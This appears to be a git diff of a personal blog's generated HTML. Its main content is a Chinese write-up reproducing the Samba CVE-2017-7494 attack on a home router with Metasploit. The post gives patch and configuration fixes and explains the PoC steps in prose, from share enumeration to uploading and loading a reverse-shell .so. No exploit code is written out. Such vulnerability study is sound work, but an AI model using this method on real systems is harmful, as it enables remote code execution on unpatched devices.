session was created.</span><br></pre></td></tr></table></figure>
<p>虽然报错,但是查看共享文件夹/tmp却发现了生成了.so文件<br>知乎这篇<a href="https://zhuanlan.zhihu.com/p/27129229" target="_blank" rel="noopener">专栏</a>也有相同问题</p> <p>虽然报错,但是查看共享文件夹/tmp却发现了生成了.so文件<br>知乎这篇<a href="https://zhuanlan.zhihu.com/p/27129229" target="_blank" rel="noopener">专栏</a>也有相同问题</p>
<h2 id="分析POC查找原因"><a href="#分析POC查找原因" class="headerlink" title="分析POC查找原因"></a>分析POC查找原因</h2><p>(来自<a href="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/" target="_blank" rel="noopener">Wzblog</a>)</p> <h1 id="修补方案"><a href="#修补方案" class="headerlink" title="修补方案"></a>修补方案</h1><p>最安全的方法还是打补丁或者升级到Samba 4.6.4/4.5.10/4.4.14任意版本,可以参考 <a href="https://www.samba.org/samba/history/security.html" target="_blank" rel="noopener">https://www.samba.org/samba/history/security.html</a></p>
<h3 id="建立SMB连接。若需要账号密码登录则必须登录后才能继续"><a href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续" class="headerlink" title="建立SMB连接。若需要账号密码登录则必须登录后才能继续"></a>建立SMB连接。若需要账号密码登录则必须登录后才能继续</h3><p>从微软上扒的SMB协议建立时序图<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-09-40.png" alt></p> <p>如果暂时不能升级版本或安装补丁,可以使用临时解决方案:<br>在smb.conf的[global]板块中添加参数nt pipe support = no<br>然后重启smbd服务。</p>
<h1 id="分析POC查找原因"><a href="#分析POC查找原因" class="headerlink" title="分析POC查找原因"></a>分析POC查找原因</h1><p>(来自<a href="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/" target="_blank" rel="noopener">Wzblog</a>)</p>
<h2 id="建立SMB连接。若需要账号密码登录则必须登录后才能继续"><a href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续" class="headerlink" title="建立SMB连接。若需要账号密码登录则必须登录后才能继续"></a>建立SMB连接。若需要账号密码登录则必须登录后才能继续</h2><p>从微软上扒的SMB协议建立时序图<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-09-40.png" alt></p>
<p>对应POC:</p> <p>对应POC:</p>
<p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/23-15-57.png" alt></p> <p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/23-15-57.png" alt></p>
<h3 id="利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><a href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path" class="headerlink" title="利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)"></a>利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-38-48.jpg" alt></p> <h2 id="利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><a href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path" class="headerlink" title="利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)"></a>利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-38-48.jpg" alt></p>
<p>其中find_writeable_path()函数需要跟进看一下:<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-14-43.jpg" alt></p> <p>其中find_writeable_path()函数需要跟进看一下:<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-14-43.jpg" alt></p>
<p>再跟进看enumerate_directories()以及verify_writeable_directory函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-48-27.jpg" alt><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-18-44.jpg" alt></p> <p>再跟进看enumerate_directories()以及verify_writeable_directory函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-48-27.jpg" alt><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-18-44.jpg" alt></p>
<p>可以看到代码逻辑很清楚首先遍历出当前路径所有的文件夹然后尝试往里面写一个随机的txt文件用作可写测试随后删除掉txt文件记录下可写的文件路径。<br>至此,我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp)</p> <p>可以看到代码逻辑很清楚首先遍历出当前路径所有的文件夹然后尝试往里面写一个随机的txt文件用作可写测试随后删除掉txt文件记录下可写的文件路径。<br>至此,我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp)</p>
<h3 id="利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><a href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath" class="headerlink" title="利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)"></a>利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-26-47.jpg" alt><br>至此获取到了共享名data的绝对路径。<br>值得注意的是这里跟早期的Payload不一样早期的payload是靠暴力猜解目录所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径极大地提高了攻击的成功率。</p> <h2 id="利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><a href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath" class="headerlink" title="利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)"></a>利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-26-47.jpg" alt><br>至此获取到了共享名data的绝对路径。<br>值得注意的是这里跟早期的Payload不一样早期的payload是靠暴力猜解目录所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径极大地提高了攻击的成功率。</p>
<h3 id="上传恶意so文件"><a href="#上传恶意so文件" class="headerlink" title="上传恶意so文件"></a>上传恶意so文件</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg" alt><br>其中写入的so文件是Metasploit生成的反弹shell很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数这个原因上述的漏洞分析也有提及。</p> <h2 id="上传恶意so文件"><a href="#上传恶意so文件" class="headerlink" title="上传恶意so文件"></a>上传恶意so文件</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg" alt><br>其中写入的so文件是Metasploit生成的反弹shell很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数这个原因上述的漏洞分析也有提及。</p>
<h3 id="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><a href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功" class="headerlink" title="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"></a>调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg" alt><br>利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so然后通过SMB_COM_NT_CREATE_ANDX进行调用。<br>在复现时调用恶意so文件总会失败产生Error Code为STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况也许要详细看看smb协议才能知道了。<br>POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志随后就是用NBSS协议进行了一次远程代码执行的测试执行代码为echo随机字符串。</p> <h2 id="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><a href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功" class="headerlink" title="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"></a>调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg" alt><br>利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so然后通过SMB_COM_NT_CREATE_ANDX进行调用。<br>在复现时调用恶意so文件总会失败产生Error Code为STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况也许要详细看看smb协议才能知道了。<br>POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志随后就是用NBSS协议进行了一次远程代码执行的测试执行代码为echo随机字符串。</p>
<h3 id="删除恶意so文件断开smb连接"><a href="#删除恶意so文件断开smb连接" class="headerlink" title="删除恶意so文件断开smb连接"></a>删除恶意so文件断开smb连接</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png" alt></p> <h2 id="删除恶意so文件断开smb连接"><a href="#删除恶意so文件断开smb连接" class="headerlink" title="删除恶意so文件断开smb连接"></a>删除恶意so文件断开smb连接</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png" alt></p>
<p>由msf给出的poc过程可见小米路由器的攻击在第五步出现问题因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND</p> <p>由msf给出的poc过程可见对路由器的攻击在第五步出现问题因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND</p>
</div> </div>
@ -718,7 +721,7 @@
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#小米路由器与Samba漏洞CVE-2017-7494"><span class="nav-text">小米路由器与Samba漏洞CVE-2017-7494</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞描述"><span class="nav-text">漏洞描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Samba介绍"><span class="nav-text">Samba介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞成因"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#小米路由器"><span class="nav-text">小米路由器</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击使用metasploit"><span class="nav-text">攻击使用metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#设置攻击参数"><span class="nav-text">设置攻击参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行攻击"><span class="nav-text">执行攻击</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析POC查找原因"><span class="nav-text">分析POC查找原因</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续"><span class="nav-text">建立SMB连接。若需要账号密码登录则必须登录后才能继续</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><span class="nav-text">利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><span class="nav-text">利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#上传恶意so文件"><span class="nav-text">上传恶意so文件</span></a></li><li 
class="nav-item nav-level-3"><a class="nav-link" href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><span class="nav-text">调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除恶意so文件断开smb连接"><span class="nav-text">删除恶意so文件断开smb连接</span></a></li></ol></li></ol></li></ol></div> <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞描述"><span class="nav-text">漏洞描述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Samba介绍"><span class="nav-text">Samba介绍</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞成因"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#某路由器满足条件"><span class="nav-text">某路由器满足条件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击使用metasploit"><span class="nav-text">攻击使用metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#设置攻击参数"><span class="nav-text">设置攻击参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行攻击"><span class="nav-text">执行攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#修补方案"><span class="nav-text">修补方案</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#分析POC查找原因"><span class="nav-text">分析POC查找原因</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续"><span class="nav-text">建立SMB连接。若需要账号密码登录则必须登录后才能继续</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><span class="nav-text">利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</span></a></li><li class="nav-item nav-level-2"><a 
class="nav-link" href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><span class="nav-text">利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#上传恶意so文件"><span class="nav-text">上传恶意so文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><span class="nav-text">调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#删除恶意so文件断开smb连接"><span class="nav-text">删除恶意so文件断开smb连接</span></a></li></ol></li></ol></div>
</div> </div>
@ -750,7 +753,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -646,8 +646,8 @@
<div class="post-nav"> <div class="post-nav">
<div class="post-nav-next post-nav-item"> <div class="post-nav-next post-nav-item">
<a href="/2019/03/25/Samba-CVE/" rel="next" title="小米路由器与Samba漏洞CVE-2017-7494"> <a href="/2019/03/25/Samba-CVE/" rel="next" title="某厂商路由器与Samba漏洞CVE-2017-7494">
<i class="fa fa-chevron-left"></i> 小米路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-left"></i> 某厂商路由器与Samba漏洞CVE-2017-7494
</a> </a>
</div> </div>
@ -853,7 +853,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -774,7 +774,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -898,7 +898,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -817,7 +817,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -739,7 +739,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -1012,7 +1012,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -802,7 +802,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -834,7 +834,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -817,7 +817,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -830,7 +830,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -713,7 +713,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -757,7 +757,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -460,7 +460,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -563,7 +563,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -598,7 +598,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -363,7 +363,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -598,7 +598,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -528,7 +528,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -528,7 +528,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -703,7 +703,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -812,7 +812,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -398,7 +398,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -707,7 +707,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -812,7 +812,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -398,7 +398,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -817,7 +817,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -537,7 +537,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -1,6 +1,9 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url> <url>
<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
<lastmod>2019-07-27</lastmod>
</url> <url>
<loc>https://cool-y.github.io/2019/07/10/x86basic/</loc> <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
<lastmod>2019-07-26</lastmod> <lastmod>2019-07-26</lastmod>
</url> <url> </url> <url>
@ -48,23 +51,20 @@
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2018/12/15/miio-control/</loc> <loc>https://cool-y.github.io/2018/12/15/miio-control/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url>
<loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc> <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2000/01/01/hello-world/</loc> <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc> <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc> <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc> <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> </url>
</urlset> </urlset>


@ -512,7 +512,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -388,7 +388,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -604,7 +604,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -500,7 +500,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -465,7 +465,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -474,7 +474,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -578,7 +578,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -474,7 +474,7 @@
